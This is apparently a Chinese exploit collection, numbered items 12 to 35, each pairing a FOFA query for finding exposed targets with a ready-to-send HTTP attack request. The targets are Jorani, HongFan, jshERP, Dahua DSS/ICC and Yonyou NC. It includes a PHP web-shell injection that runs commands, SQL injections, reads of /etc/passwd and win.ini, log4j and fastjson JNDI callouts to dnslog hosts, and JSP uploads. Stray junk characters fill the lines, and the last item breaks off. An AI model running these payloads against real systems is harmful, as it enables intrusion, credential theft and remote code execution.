3 C2 J+ \5 J. k9 \4 M! BUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36! d, B, P( X4 @
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
9 W; a% C( \$ T# O0 zAccept-Encoding: gzip, deflate8 o) C! @$ i1 E' ?2 K: a6 C/ p9 p
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
6 m. l# r/ L8 N" q' q A5 ]Connection: close8 M1 F" Z! [* b+ H% \7 k
' c& Z9 S, Y6 g3 S
8 c, S/ S/ r+ ^( p8 I12. Jorani < 1.0.2 远程命令执行
8 }6 G, L0 G% I, WFOFA:title="Jorani"# A+ E8 P6 ?" G! c4 I8 i% s8 U
第一步先拿到cookie p/ y" ]8 g- k& N, i" Z
GET /session/login HTTP/1.1
' h, N9 V6 ^6 \7 I; j, XHost: 192.168.190.30, q; r6 K) A) v; K$ j
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36- T0 f- i0 U& H- Y, v- U6 L: r
Connection: close! ?: Z6 Y/ l% {6 f% L8 x$ `* u1 ~; T% g
Accept-Encoding: gzip, A% H6 [2 Q, y( V0 v
/ z( Z& v2 U% Y+ f
, M; U7 [# }2 Q. I: d' t响应中csrf_cookie_jorani用于后续请求0 z/ |' B! Z# D: d. Y
HTTP/1.1 200 OK
, z( A* o' Y9 v1 I4 E9 k. l( ZConnection: close" Q, X* j. N& t/ i4 a9 g- I) Q. d( @2 p
Cache-Control: no-store, no-cache, must-revalidate
, \) t+ @" K% e" NContent-Type: text/html; charset=UTF-8
# A9 c8 C' B1 XDate: Tue, 24 Oct 2023 09:34:28 GMT
8 s; K+ }- x/ |Expires: Thu, 19 Nov 1981 08:52:00 GMT! ]9 Z, ~, }! M/ Z6 V
Last-Modified: Tue, 24 Oct 2023 09:34:28 GMT+ j' _; A6 E" l7 w
Pragma: no-cache
0 B6 ~4 `5 k) ?Server: Apache/2.4.54 (Debian)3 ^# g1 F( Z% G% p1 d) I4 Y
Set-Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/
: `5 A) a2 ?! r3 H! `* i0 jSet-Cookie: jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/; HttpOnly
' j( k: H# U- D7 \! T2 b LVary: Accept-Encoding9 b l- n Y9 T
9 {! i D1 t( W& h0 G" h% x' B3 ~- u; l- ?: _5 f) [, N& A
POST请求,执行函数并进行base64编码
/ U( X) s* v( m; ^; J6 }4 ^* ]POST /session/login HTTP/1.1
3 @% m! @- f- v: o1 fHost: 192.168.190.30
, ~7 L5 F% N7 y1 l8 xUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36! S$ x) @, s2 A7 a$ o8 d6 [
Connection: close
. u& v( r% H. i+ t' b5 CContent-Length: 252
1 [1 k: m# \6 g7 [8 hContent-Type: application/x-www-form-urlencoded5 J# ] [6 Q6 Y
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r% R( |1 |3 A) a0 \; K- P
Accept-Encoding: gzip
8 l$ \9 C* j9 p) t
# W% ]. b4 T' u8 ^/ qcsrf_test_jorani=6ca560f2b0baf3cda87c818a4a15dc77&last_page=session%2Flogin&language=..%2F..%2Fapplication%2Flogs&login=<?php if(isset($_SERVER['HTTP_K1SYJPMHLU4Z'])){system(base64_decode($_SERVER['HTTP_K1SYJPMHLU4Z']));} ?>&CipheredValue=DummyPasswor
5 j: p6 b. k2 v% E# Q9 v3 ~8 c, \! J+ P6 a. j
. F+ u0 h# q# p0 n# \- D. i' A* S
1 q, K' f( O9 N9 z. b$ U( v向靶场发送如下请求,执行id命令,请求头中的ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=是命令base64编码后的字符串
- w$ {* B: z. _GET /pages/view/log-2023-10-24 HTTP/1.1# _! I! p" P! M4 L& g' e# \
Host: 192.168.190.30 A; ^# e$ S+ D3 s) O( e/ Q
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
1 H0 _, g7 X, O( } L+ |) dConnection: close
Y- R5 ^) P0 J v0 hCookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
- B ]! B* o& D: `( m! k1 KK1SYJPMHLU4Z: ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=+ A; ?1 F( Y6 V
X-REQUESTED-WITH: XMLHttpRequest
_ [, {- N0 C: {/ KAccept-Encoding: gzip
: ?5 y8 T: @) p6 [# g1 b, c7 O8 d; h6 C
' I# o% } k# b/ b' r
13. 红帆iOffice ioFileDown任意文件读取$ y- j; @1 H: A* x# z
FOFA:app="红帆-ioffice"9 M% X# f/ _+ D1 ?
GET /ioffice/prg/interface/ioFileDown.aspx?sFilePath=c:/windows/win.ini HTTP/1.1! t& V9 `* `8 H" i$ k4 P
Host: x.x.x.x
4 f3 c; T- c* IUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36; O' _7 D6 Z- f4 g
Connection: close
7 v2 X- m, Q$ U2 v( r; R* L/ JAccept: */*1 U# M% r$ n6 \
Accept-Encoding: gzip
4 c$ G% z r: i; `; }% s! F
& H4 @" h0 a @2 e; W2 T1 S
) h6 w: ?" [6 x) T" h/ I14. 华夏ERP(jshERP)敏感信息泄露
2 h( r; H8 w% p5 U! @FOFA:body="jshERP-boot"
/ z( h, M8 p0 O8 |" R8 Q3 |# ?泄露内容包括用户名密码
" V4 ]5 e: `( n' K; ]1 NGET /jshERP-boot/user/getAllList;.ico HTTP/1.1' _& u/ h" d3 J3 f! V, H7 u
Host: x.x.x.x! z1 A* j* e/ H) _
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
- Z2 x2 B/ i$ z) R* u* w+ z& u5 tConnection: close
" M: j( u9 q% N7 w# ]/ lAccept: */*
9 t* x! D& v% h* P: @5 R' ?Accept-Language: en$ n) @9 A2 y4 S) i, T3 r8 l7 {
Accept-Encoding: gzip
" M, s1 Q& k+ h) T) t" ~( H1 W0 d2 A5 u3 L& G1 U2 h
. q! p5 H+ u% ]2 b t+ ~15. 华夏ERP getAllList信息泄露+ p. b8 K- o7 B' }3 i# c$ l4 T
CVE-2024-04901 e$ Z* Q1 Q& y" X- E- F' G
FOFA:body="jshERP-boot"
% v; ? z9 c7 A5 [泄露内容包括用户名密码, ]- \, \1 t0 C& b4 K
GET /jshERP-boot/user/a.ico/../getAllList HTTP/1.1
9 O# j X$ t8 Z3 o7 ~Host: 192.168.40.130:100
+ X2 q6 X+ t- B$ ] `# _ W) @User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36$ ?- U' ?( q' b1 r! i
Connection: close" G) q, j; F- y, K2 r1 V3 t! q
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
0 s- k. d* {6 sAccept-Language: en3 m" _+ s* N0 ]) a
sec-ch-ua-platform: Windows
* x9 d p7 H8 f' v; SAccept-Encoding: gzip2 d+ }+ O9 i% ?2 i$ R6 S) S6 L6 W
" K9 i& q' p2 F2 l) ~6 W* Q$ }9 a5 S" W4 o9 H5 M5 l0 \
16. 红帆HFOffice医微云SQL注入/ w% U" g( `3 g. o" D3 D" o4 L0 V
FOFA:title="HFOffice"; q; l$ y1 ^8 T% ^0 H. |& L
poc中调用函数计算1234的md5值. e3 ]! r$ W9 K1 w, R
GET /api/switch-value/list?sorts=%5B%7B%22Field%22:%221-CONVERT(VARCHAR(32),%20HASHBYTES(%27MD5%27,%20%271234%27),%202);%22%7D%5D&conditions=%5B%5D&_ZQA_ID=4dc296c6c69905a7 HTTP/1.1
$ \ F3 v6 I6 E1 }) j pHost: x.x.x.x1 L! J1 g* K1 q% A/ V
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36) [$ }* |+ M2 Q [" e& n- J
Connection: close
& g+ c' a; y( t! a6 ]Accept: */*' C% @2 H# k. {$ Y' Z7 S, T
Accept-Language: en" L0 }6 I8 K0 N2 e; l
Accept-Encoding: gzip
. S0 B9 P* @( e/ u. R+ S
2 D9 P0 `" Y7 D, V$ a4 }8 V. s
1 m# m8 l( J2 ^8 i2 O; c5 b17. 大华 DSS itcBulletin SQL 注入
1 i6 U5 y# G, e8 [% b4 RFOFA:app="dahua-DSS"
& |4 {9 Y" c5 x) pPOST /portal/services/itcBulletin?wsdl HTTP/1.1
& u9 c& H1 ]/ S9 BHost: x.x.x.x* }% P& p% B" J
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
+ b% k3 h9 A7 `5 r8 AConnection: close* X6 N8 j! b( s! d8 ?6 [( M* U0 ]
Content-Length: 345
8 K, X1 |4 g8 \; P7 y pAccept-Encoding: gzip
. p' Q( }, n5 J
' q3 n8 F4 Y& K; E! b4 p<s11:Envelope xmlns:s11='http://schemas.xmlsoap.org/soap/envelope/'>3 Z5 {8 _. S' v
<s11:Body>
9 i/ S, D5 z+ D5 ^" c <ns1:deleteBulletin xmlns:ns1='http://itcbulletinservice.webservice.dssc.dahua.com'>
; \4 V5 ^( Z7 | r. W' I- N <netMarkings>
: _/ q1 y4 Z( H (updatexml(1,concat(0x7e,md5(102103122),0x7e),1))) and (1=12 L* I, V' E, r
</netMarkings>. D, Y8 a0 D; ]2 O4 ? N. A2 W
</ns1:deleteBulletin>% \: w( u2 x: v" I# l/ V- Y. b
</s11:Body>
% _9 L2 _# r9 M4 D/ k6 d3 w</s11:Envelope>
9 O2 d9 V6 f) q# K7 L3 ^' P) c0 b& D5 _ l
* x5 _% v) l; [4 g6 W18. 大华 DSS 数字监控系统 user_edit.action 信息泄露) a9 o. _& d+ R1 H
FOFA:app="dahua-DSS" G' g. G, L6 |# M. ?, c+ A
GET /admin/cascade_/user_edit.action?id=1 HTTP/1.11 Y" q+ I$ ~& c: ^9 H7 c8 X3 R
Host: your-ip4 _+ |/ U5 ]) D; Z
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36! i+ D$ U. P g+ g
Accept-Encoding: gzip, deflate
2 k h4 r/ g3 [9 N) @Accept: */*) v4 F4 ~) [/ p, G8 h
Connection: keep-alive
- z3 e1 Y+ v5 @' J5 R4 M
& k0 r J. U& n9 B
9 J6 Z8 h4 @& S/ A9 X2 _8 A) [6 x8 {) z' N
19. 大华 DSS 数字监控系统 attachment_clearTempFile.action SQL注入
9 W! w9 R1 `# W& e7 C+ BFOFA:app="dahua-DSS"
$ z8 O6 P$ t2 N- _- A# `' `% |7 @; _GET /portal/attachment_clearTempFile.action?bean.RecId=1%27)%20AND%20EXTRACTVALUE(8841,CONCAT(0x7e,user(),0x7e))%20AND%20(%27mYhO%27=%27mYhO&bean.TabName=1 HTTP/1.1, t# B6 K$ u/ G) v
Host:
4 s* D1 s. |3 w2 FUser-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36. ~( m) q6 o2 D0 R
Accept-Encoding: gzip, deflate
2 p1 {8 J0 P& U& q$ yAccept: */*
, W$ K8 T7 c; {6 R; Y3 N2 P6 FConnection: keep-alive
' o3 I# T$ d8 s0 g5 ]/ g9 `3 _4 E+ e& a/ b! {$ P7 E
$ j% x2 E6 M! ?, N1 x3 `! }6 b" l% U
20. 大华ICC智能物联综合管理平台任意文件读取) o3 H1 w: z2 I1 l5 k/ O( X, ~% G
FOFA:body="*客户端会小于800*") E/ I9 a7 I: V, Q* _1 j" K& s2 ~% L
GET /evo-apigw/evo-cirs/file/readPic?fileUrl=file:/etc/passwd HTTP/1.1
6 L9 c' I# I J0 x$ [& ~Host: x.x.x.x
. E. J! i1 w! @; C5 [User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36, _( v: _$ y7 H& t% X3 P7 c
Connection: close* e4 n+ P9 f6 n8 U
Accept: */*, h" R$ O' O4 v0 p; ?/ b
Accept-Language: en/ S& ~( a. M9 Z! U
Accept-Encoding: gzip0 z; \; [: y% c3 e0 f2 _0 S
0 Q+ T' }; @# v y" d1 ^
[8 X3 h% b8 }& R1 O/ d$ G21. 大华ICC智能物联综合管理平台random远程代码执行
' e1 d4 j: }; bFOFA:icon_hash="-1935899595"# c4 g/ C. _' G' W7 c5 `/ Y1 _
POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
! m5 r2 k* b _Host: x.x.x.x4 X% x, E( y" e: m* R- E; ?
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15; Y! X0 C4 a, N1 X; _& @
Content-Length: 1617 t p" i% A( e1 F! r; u) o& ~+ M
Accept-Encoding: gzip$ u9 p2 v& b4 T: J+ B# ~
Connection: close1 z3 R# p. o) }4 r2 N; L
Content-Type: application/json;charset=utf-8/ p: c6 e5 ?% }2 o, e
" m4 {. `9 p9 g3 ]{
3 n ~/ D, @1 h! ?( g" @"a":{7 q" I, Z* I- l, e: ~
"@type":"com.alibaba.fastjson.JSONObject",
5 {6 o( D$ ~( k5 V; d% |0 t {"@type":"java.net.URL","val":"http://farr9frh.dnslog.pw"}
! U3 f0 N9 p% Q1 I+ m& I% g2 \ }""
, ^7 [' n* s* l( @! k& \}
1 ^4 @+ s- _9 z" D7 O" t8 x
5 ~; y5 Q2 o z+ \
' }6 Q) {' K K7 x6 m+ _+ s- B22. 大华ICC智能物联综合管理平台 log4j远程代码执行- E, \7 d' R/ U; P
FOFA:icon_hash="-1935899595"
8 X& x) L" p. i2 H/ s( ?POST /evo-apigw/evo-brm/1.2.0/user/is-exist HTTP/1.1
; {5 ]+ ]% }/ z4 {& iHost: your-ip
4 p! d- z7 o' k. C, bUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
" e* J# {5 b8 E. s, | Q6 PContent-Type: application/json;charset=utf-8
1 o# g+ L' Y( P, G+ U4 e5 D- y" f8 I/ `: ^
{
/ r) k/ Q p W' R L5 w0 w* f"loginName":"${jndi:ldap://dnslog}"! s: H' \! P; M& I% L3 C
}
3 M* h7 s* _. l7 Z( v, f
& J; k7 l5 O5 n- R- t4 g9 y$ ?6 x! {% G' N
* P; U, Z" I `* i/ H! K+ y7 D# s
23. 大华ICC智能物联综合管理平台 fastjson远程代码执行
& Q* l0 G1 n/ D! | V0 p0 fFOFA:icon_hash="-1935899595"% Y1 R3 E4 h% L9 v# g
POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1/ @: a' }2 K; {' @ ?
Host: your-ip
- e2 x0 b! o$ a+ _' y4 o) hUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15" c, t- e+ N6 w3 @
Content-Type: application/json;charset=utf-8+ `4 p4 _+ b" {9 L! K+ A0 ~* |
Accept-Encoding: gzip$ k8 p$ r7 N: x8 x1 _
Connection: close
0 `* Y2 a4 z9 j1 V+ a+ \7 t1 Z& `7 m% t% s4 s6 R2 y
{
% K! n7 [+ B! M: e" O "a":{
& A8 B4 a0 V# l0 D "@type":"com.alibaba.fastjson.JSONObject",
; X4 G0 C4 j: x1 X/ i- t4 y {"@type":"java.net.URL","val":"http://DNSLOG"}
: \- l8 K# v- R1 _8 b6 p2 N }""
- V9 @- c5 x3 x' @}% {) m0 Y) e4 X. {! j
/ K$ s- ^$ d" H9 ?8 d% L4 _1 T2 p, w
( g" V6 @# u' p0 m1 j! _
24. 用友NC 6.5 accept.jsp任意文件上传
+ j4 `/ D8 p0 F. N7 W9 p* p' ZFOFA:icon_hash="1085941792"
$ G9 i2 Y+ }# e1 o, S6 [/ TPOST /aim/equipmap/accept.jsp HTTP/1.15 }9 H# @' }' x+ N& G6 o/ R
Host: x.x.x.x7 d% y3 s5 X: z- o7 n' R
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.362 B9 p; N4 d: W) {
Connection: close
$ B; }2 B4 U, ]Content-Length: 449, F8 U1 `6 `' R1 n$ i
Accept: */*
3 V$ z' z4 R8 w: Y) t; vAccept-Encoding: gzip
" k1 S! c& t( r$ N: Q. }Content-Type: multipart/form-data; boundary=---------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
G/ ^+ _. @4 x; j9 t) A0 k! Z5 y
5 N& o1 o2 ? y& Q; K% c-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
4 R- y3 P. p" s0 Q2 O1 r. FContent-Disposition: form-data; name="upload"; filename="2XpU7VbkFeTFZZLbSMlVZwJyOxz.txt"+ W7 m# V( B/ R9 h+ @
Content-Type: text/plain3 T9 n. q( \8 r/ m E
4 R% k+ r7 G" Z! X6 R
<% out.println("2XpU7Y2Els1K9wZvOlSmrgolNci"); %>! K$ w+ J) H C: D
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
* g; p% b- h, E7 e" Y9 ?/ n* XContent-Disposition: form-data; name="fname"
3 m' N+ f" v/ W6 ~2 y! c* \. H# e4 P% s1 K5 d- d5 b' L
\webapps\nc_web\2XpU7WZCxP3YJqVaC0EjlHM5oAt.jsp
- G' N8 n. t8 h2 G1 a( X# }. e: N/ E-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc--
# P, ^& n- G$ p, {: g( x5 o# Z2 B) s% c1 E+ M: N
/ G# F" C6 r5 J1 T ~% \% }25. 用友NC registerServlet JNDI 远程代码执行1 G I- b6 T; u" R9 b
FOFA:app="用友-UFIDA-NC" t) U& Y# D: p8 m
POST /portal/registerServlet HTTP/1.1
$ H5 B {+ @7 n' _! LHost: your-ip h& P M2 x9 |
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0/ q! p' O6 t4 Y
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*; q=0.8,application/signed-exchange;v=b3;q=0.9
8 U4 I9 R& b5 H- ?) ~Accept-Encoding: gzip, deflate1 E) m! n6 w8 _0 D9 o
Accept-Language: zh,en-US;q=0.9,en-GB;q=0.8,en;q=0.7,zh-CN;q=0.6
7 Q7 M! y6 X0 M. a* Z# ]Content-Type: application/x-www-form-urlencoded
* F' O6 v z* k5 f) Z8 F$ P6 O6 R) s( s
type=1&dsname=ldap://dnslog; h3 s/ T) ?5 }8 ^
) N, o' g5 ]3 M" E1 a
8 v `# t% _" z+ @; z" V
. F% g5 s" ^! P2 s2 \% h) J% u26. 用友NC linkVoucher SQL注入! y; @# ^/ c$ S* @8 b. P6 q
FOFA:app="用友-UFIDA-NC"
# Z5 B! d I0 t DGET /portal/pt/yercommon/linkVoucher?pageId=login&pkBill=1'waitfor+delay+'0:0:5'-- HTTP/1.1
1 [9 g& o) j- x- a. L) p9 eHost: your-ip- I4 v5 S8 |: A. h' G% H( W
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36/ j2 q8 |7 w- B
Content-Type: application/x-www-form-urlencoded
4 B J; u$ J& U) j% m7 `5 }! BAccept-Encoding: gzip, deflate
9 k) e1 s: `: T; p# |. [3 CAccept: */*2 W- J1 J7 p& V4 T) {" ~$ X
Connection: keep-alive
+ u# x# W3 N! t$ j' H, i8 L* k' W/ N6 q
$ `. M7 c/ m6 ?+ n7 Z27. 用友 NC showcontent SQL注入
1 Y0 t, g( u, N. g+ |- `+ @FOFA:icon_hash="1085941792"1 g1 e4 ?1 l7 q+ M$ f1 O: U! r
GET /ebvp/infopub/showcontent?id=1'+AND+1=DBMS_PIPE.RECEIVE_MESSAGE(1,5)-- HTTP/1.1
% T4 \; Z; `0 x0 ^& T3 A3 ~" lHost: your-ip( E" v- ^) C# Z7 R* |! |. Y
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36: O0 B. R' P5 o, x# I. y+ o7 ~
Accept-Encoding: identity
5 m- _8 a! C9 l& K9 HConnection: close9 }+ T- j9 ?/ X; M% L2 v
Content-Type: text/xml; charset=utf-8; H+ B4 E8 X! E) U: y+ x
3 w, z t+ L- N3 n5 i$ h
8 W; @/ B/ I5 \9 ?! X: l8 m8 t8 B
28. 用友NC grouptemplet 任意文件上传
% M2 K" C- _/ T4 DFOFA:icon_hash="1085941792"4 z1 `3 C' y: t9 m8 Q0 `
POST /uapim/upload/grouptemplet?groupid=nc&fileType=jsp HTTP/1.1
% m5 p/ G' d. x `2 \: X* HHost: x.x.x.x
2 O" ~; V6 R, m8 c3 A/ YUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
# @4 u1 ?. _/ P; MConnection: close
, }/ B% f- X3 C/ y$ jContent-Length: 268
6 b) D+ L7 h4 z/ VContent-type: multipart/form-data; boundary=----------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk y3 @1 ]; h- K! y
Accept-Encoding: gzip O8 F+ R; L7 f- a5 f
0 G/ E% c$ q+ V, r" q7 ?& P1 m
------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
0 M' x; [+ }! QContent-Disposition: form-data; name="upload"; filename="2fiu0YTGkaX2DrJlUZZP5IGvNvk.jsp"0 r% M4 [8 T& n9 J
Content-Type: application/octet-stream
3 W {9 V( f0 w. `- E( W$ T* W- J |$ U9 E+ C
<%out.println("2fiu0WM4788fa6NcMHipkIthTTW");%>6 Q" o# }7 @" {! I
------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk--4 Q* e$ E$ b0 X- c1 C* R
( _' T8 d1 k# b' ^$ a) W/ n6 \" Z4 c$ n* N1 D9 ^
/uapim/static/pages/nc/head.jsp
9 m5 w/ K& Q" L5 m6 X. s* \/ ? @/ `; x2 ~1 A. i" R. n, H
29. 用友NC down/bill SQL注入
" d7 f% h) W+ E3 c- \4 S) K2 mFOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"/ n% I" W Y: p3 r+ Q' f
GET /portal/pt/erfile/down/bill?pageId=login&id=1'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
; G: U3 T0 j! R# G" yHost: your-ip8 h- @; g& F) P7 y5 o( T
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
- P- Y7 b5 C- t& VContent-Type: application/x-www-form-urlencoded" x I5 h0 r, c/ H- @( D
Accept-Encoding: gzip, deflate( Z" @% j) Z; p1 ^
Accept: */*5 g2 ~, A2 `" B/ O
Connection: keep-alive
2 m0 v9 y9 X( C8 b6 T/ U3 P3 k$ S) x0 N7 H9 E2 v' X7 F! G/ g
5 V% n8 ]7 |, x) [/ q
30. 用友NC importPml SQL注入
/ t8 p! c* Q: _FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
" { S6 i& Q8 d2 Z& wPOST /portal/pt/portalpage/importPml?pageId=login&billitem=1'WAITFOR+DELAY+'0:0:5'-- HTTP/1.19 b: r! l6 e9 [0 Y3 N2 H: E
Host: your-ip! |, X/ G2 ?+ K! `: i
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryH970hbttBhoCyj9V
$ z3 u% e: F# f2 f1 ~2 ?( qUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.361 V$ c/ Z- ?7 X8 Z9 z
Connection: close K: t% S/ a# G. n" `! O4 u
. i5 {$ d: S4 }( _3 ^' _
------WebKitFormBoundaryH970hbttBhoCyj9V
8 w; b) K5 p$ R, GContent-Disposition: form-data; name="Filedata"; filename="1.jpg"
, D, h; n+ I. F* g" M, t2 F& iContent-Type: image/jpeg/ D! @ q* \) U2 I8 k/ r
------WebKitFormBoundaryH970hbttBhoCyj9V--! D% x- ~! v5 N3 e
5 R. Y) J5 I: k8 `6 x0 |$ N' \
( d, n! g+ W* I5 Z* }31. 用友NC runStateServlet SQL注入
; v0 e: e& d- i: L4 q: d! gversion<=6.5
8 m' a8 V; o# ^. o) k# \( s3 O7 MFOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"! T7 M( U$ o/ z: t, }1 _
GET /portal/pt/servlet/runStateServlet/doPost?pageId=login&proDefPk=1'waitfor+delay+'0:0:5'-- HTTP/1.1" Q8 ^3 t# ^5 n/ b" y
Host: host X- x& g0 f' {) L, g4 f
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
; Z" N6 T6 I0 [3 O0 ?Content-Type: application/x-www-form-urlencoded
O/ }- m- R, d0 u- ] y8 x/ r. ]+ g
9 _) v& W* q2 c7 H
32. 用友NC complainbilldetail SQL注入6 v) h( f0 Z* {) G! N" f
version= NC633、NC65
d( ]1 z, V: W3 @, i( |# ?: PFOFA:app="用友-UFIDA-NC" R$ G: z" M3 P3 A' c8 t1 ^# u9 N
GET /ebvp/advorappcoll/complainbilldetail?pageId=login&pk_complaint=1'waitfor+delay+'0:0:5'-- HTTP/1.1+ ?/ q' k. z, b) H9 [ E
Host: your-ip
, Z; i1 ~" [1 [1 |. K" d! B6 X+ ?1 ^/ VUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.365 Q2 K/ a6 C0 W9 _& `1 n$ `: _
Content-Type: application/x-www-form-urlencoded# C0 E! J% L* [* }/ F2 J
Accept-Encoding: gzip, deflate+ @" h- O. B9 |+ I% C0 ?
Accept: */*
, B5 C# @- S' y3 a% T+ X7 qConnection: keep-alive9 @ c6 w. b/ \* T4 h
C' ^* v( A$ f3 o. V) h6 \
+ e7 c' I5 k3 {; |9 Y33. 用友NC downTax/download SQL注入; i$ D0 b7 P& q; u1 c
version:NC6.5FOFA:app="用友-UFIDA-NC"/ N0 C, D6 N; }- I: W$ W
GET /portal/pt/downTax/download?pageId=login&classid=1'waitfor+delay+'0:0:5'-- HTTP/1.1* |% k4 ]9 A l0 M! |2 _3 I
Host: your-ip
, x9 ]3 Q- s3 IUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.364 Y+ G! W& V6 p6 z G3 Y. t' Q: k
Content-Type: application/x-www-form-urlencoded
0 u" R& D5 _7 @ G' s" lAccept-Encoding: gzip, deflate
; ^+ E: }; ^& N& t/ hAccept: */*) e Z: }9 i- a3 |
Connection: keep-alive
2 }: t9 Z g" h! C" a- F1 L, L1 `2 ?7 ?/ v4 G
* m( e+ v+ X3 p34. 用友NC warningDetailInfo接口SQL注入
, a2 a& A8 `! u: S s9 k: WFOFA:app="用友-UFIDA-NC"
' A8 G/ G- j' oGET /ebvp/infopub/warningDetailInfo?pageId=login&pkMessage=1'waitfor+delay+'0:0:5'-- HTTP/1.1# I5 o$ }7 G. r% p3 t- o- E
Host: your-ip
6 t2 ~% U6 ~! GUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
6 y' i! i$ }3 w, S! Z; Z& tContent-Type: application/x-www-form-urlencoded
9 K! d, u; u* \; @: M( XAccept-Encoding: gzip, deflate3 B ^% p# L8 X, u
Accept: */*' w2 |$ l u5 s' t7 z& m
Connection: keep-alive
3 A0 p* D& Q/ Q5 h/ I, f5 i2 B# ^6 U
! |4 B0 ]$ v3 Q" F( R, X35. 用友NC-Cloud importhttpscer任意文件上传
/ ^ G5 V2 U5 D ^5 g6 gFOFA:app="用友-NC-Cloud"0 y5 m' \) s: n9 a0 P- G
POST /nccloud/mob/pfxx/manualload/importhttpscer HTTP/1.1
6 t. c4 k- g& U0 V5 c( _& CHost: 203.25.218.166:8888
